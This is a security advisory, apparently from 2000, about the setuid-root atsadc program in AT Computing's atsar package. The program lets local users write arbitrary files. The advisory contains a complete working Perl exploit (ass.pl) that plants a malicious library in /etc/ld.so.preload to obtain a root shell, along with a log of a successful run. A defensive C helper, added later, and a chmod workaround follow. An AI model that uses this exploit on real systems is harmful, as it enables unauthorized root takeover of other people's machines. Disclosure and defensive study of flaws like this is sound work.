Linux atsadc Input File Check Vulnerability

Date: 2000-05-23

Published: 2000-3-14
Updated: 2000-3-14

Affected systems:
    AT Computing atsar 1.4-linux
    Halloween Linux 4.0

--------------------------------------------------------------------------------
Description:

atsar is a load-monitoring package for Linux produced by AT Computing. One program in
the package, atsadc, is installed with the setuid root bit set. atsadc accepts an
argument as its input file name and opens that file, but it does not check whether
the invoking user has permission to read or write it. Because it opens or creates
the target file as root, an attacker can write arbitrary content to that file. By
creating malicious system files, a local attacker can obtain root privileges: for
example, create a malicious shared library, add its path to /etc/ld.so.preload, and
then run a setuid root program (such as /usr/bin/passwd); the malicious shared
library is then preloaded and executed.


<* Source: krahmer <krahmer@cs.uni-postdam.de>

   TESO advisory -- atsadc (http://teso.scene.at)
*>

--------------------------------------------------------------------------------
Test program:

    liane:[bletchley]> id -a
    uid=501(bletchley) gid=501(bletchley) groups=501(bletchley)
    liane:[bletchley]> uname -a
    Linux liane.c-skills.de 2.2.13-13 #21 Thu Mar 2 10:36:13 WET 2000 i686 unknown
    liane:[bletchley]> stat `which atsadc`
      File: "/usr/sbin/atsadc"
      Size: 16000 Filetype: Regular File
      Mode: (4755/-rwsr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
    Device: 3,1 Inode: 117038 Links: 1
    Access: Thu Mar 9 10:09:37 2000(00000.01:02:49)
    Modify: Tue Nov 9 23:57:50 1999(00120.11:14:36)
    Change: Tue Mar 7 14:55:23 2000(00001.20:17:03)
    liane:[bletchley]> cd atsar-hack/
    liane:[atsar-hack]> ./ass.pl
    Creating hijack-lib ...
    Compiling hijack-lib ...
    Compile shell ...
    Invoking vulnerable program (atsadc)...
    sh: error in loading shared libraries:
    sh: error in loading shared libraries:
    Welcome. But as always: BEHAVE!
    sh-2.03# id -a
    uid=0(root) gid=0(root) groups=501(bletchley)
    sh-2.03#



---------------------------- ass.pl ------------------------------------------
#!/usr/bin/perl

# Halloween 4 local root-exploit, other distros are maybe
# affected as well. (atsadc program)
# (C) 2000 C-skills development, S. Krahmer under the GPL
# http://www.cs.uni-potsdam.de/homepages/students/linuxer

# Exploit will create /etc/ld.so.preload, so it should NOT exist
# already. THIS FILE WILL BE LOST!

# ! USE IT AT YOUR OWN RISK !
# For educational purposes only.

print "Creating hijack-lib ...\n";
open O, ">/tmp/boom.c" or die "open(boom.c..)";
print O<<_EOF_;
#include <sys/types.h>

int time(void *v)
{
    chown("/tmp/boomsh", 0, 0);
    chmod("/tmp/boomsh", 06755);
    unlink("/etc/ld.so.preload");
    exit(1);
}
_EOF_
close O;

print "Compiling hijack-lib ...\n";
$foo = `cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
$foo = `cc -shared /tmp/boom.o -o /tmp/boom.so`;

open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
print O<<_EOF2_;
#include <stdio.h>
int main()
{
    char *a[] = {"/bin/sh", 0};
    setuid(0); setregid(0, 0);
    execve(a[0], a, 0);
    return 0;
}
_EOF2_
close O;

print "Compile shell ...\n";
$foo = `cc /tmp/boomsh.c -o /tmp/boomsh`;

umask 0;

print "Invoking vulnerable program (atsadc)...\n";
$foo = `atsadc 2 1 /etc/ld.so.preload`;
open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload.";
print O "/tmp/boom.so";
close O;
$foo = `/usr/bin/passwd`;

# let it look like if we have sth. to do. :)
sleep 3;
print "Welcome. But as always: BEHAVE!\n";
system("/tmp/boomsh");



--------------------------------------------------------------------------------
Recommendations:

    Temporary workaround: chmod u-s atsadc
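Removing the setuid bit is only a stopgap; the permanent fix belongs in the program. The following is an added example, not atsar's own code: a helper for a setuid root tool that opens a user-named file with the invoking user's real uid and gid, so the kernel enforces that user's permissions and the program can no longer be pointed at files such as /etc/ld.so.preload. The function name, the self-check and the /tmp paths are assumptions constructed for this example.

```c
#define _DEFAULT_SOURCE   /* declares seteuid/setegid/symlink on glibc */
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open a path chosen by the user with the privileges of the REAL user, not the
 * effective (setuid root) one. The kernel then applies the caller's own file
 * permissions, so a setuid tool cannot be pointed at /etc/ld.so.preload.
 * Returns the fd, or -1 with errno set; privileges are restored either way. */
int open_as_real_user(const char *path, int flags, mode_t mode)
{
    uid_t saved_euid = geteuid();
    gid_t saved_egid = getegid();
    int fd, saved_errno;

    /* Drop the group first, then the user (the usual order when lowering). */
    if (setegid(getgid()) != 0 || seteuid(getuid()) != 0)
        return -1;
    fd = open(path, flags | O_NOFOLLOW, mode);   /* also refuse symlinks */
    saved_errno = errno;
    /* Restore user first, then group. If the saved state cannot be regained
     * the privilege state is unknown, so bail out rather than continue. */
    if (seteuid(saved_euid) != 0 || setegid(saved_egid) != 0)
        abort();
    errno = saved_errno;
    return fd;
}

/* Self-check on constructed paths: a file the caller may create opens, a
 * symlink planted in its place is refused, and the effective ids are unchanged. */
int self_check(void)
{
    const char *target = "/tmp/atsadc_example_target.txt";  /* constructed */
    const char *link_path = "/tmp/atsadc_example_link";      /* constructed */
    uid_t euid_before = geteuid();
    int fd = open_as_real_user(target, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) return 0;
    close(fd);
    unlink(link_path);
    if (symlink(target, link_path) != 0) return 0;
    int link_fd = open_as_real_user(link_path, O_WRONLY, 0);
    int refused = (link_fd < 0);
    if (link_fd >= 0) close(link_fd);
    unlink(link_path);
    unlink(target);
    return refused && geteuid() == euid_before;
}
```

When the process is not setuid (real and effective ids already equal) the helper behaves like a plain open() with O_NOFOLLOW, which is what the self-check exercises.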

All rights reserved. Reproduction without permission is prohibited.